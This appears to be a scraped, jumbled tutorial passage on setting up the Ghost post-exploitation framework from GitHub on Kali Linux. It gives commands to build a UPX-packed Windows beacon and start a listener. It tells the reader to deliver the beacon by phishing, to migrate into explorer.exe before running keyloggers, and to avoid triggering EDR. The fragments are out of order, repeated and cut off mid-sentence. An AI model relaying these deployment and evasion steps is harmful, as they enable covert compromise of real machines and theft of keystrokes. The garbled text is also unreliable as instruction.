Ghost Framework Kali Linux Github Apr 2026
ghost > sessions -i 1 Inside an active session, you can load modules:
cd Ghost Ghost requires Python 3.9+ and a handful of pip packages. The framework includes an installer script, but I prefer to inspect dependencies first.
sudo python3 setup.py install Alternatively, if you want to run from source without installation: ghost framework kali linux github
Use migrate to jump into a trusted process like explorer.exe before running keyloggers. Ghost vs. Other Frameworks | Feature | Ghost Framework | Meterpreter | Covenant (C2) | |---------|----------------|-------------|---------------| | Setup complexity | Low | Medium | High | | Windows evasion | Good | Excellent | Medium | | Linux support | Medium | Low | Low | | Community modules | 30+ | 200+ | 15+ | | Memory footprint | ~2MB | ~5MB | ~10MB |
ghost > build windows/x64 beacon.exe --upx ghost > listen http 0.0.0.0 8080 3. Deploy the agent Get beacon.exe onto your target (phishing, dropbox, or SMB share). When executed, it calls back to your Kali box. 4. Interact with the session Once a session checks in, list active sessions: ghost > sessions -i 1 Inside an active
Ghost is perfect for CTFs, OSCP labs, and quick internal assessments where you don't want to trigger EDR with standard Metasploit patterns. Customizing from GitHub Source Since you have the repo, you can write your own modules. Ghost modules live in ghost/modules/ . The structure is dead simple:
git clone https://github.com/EntySec/Ghost.git Navigate into the directory: Ghost vs
Install globally (recommended for Kali):
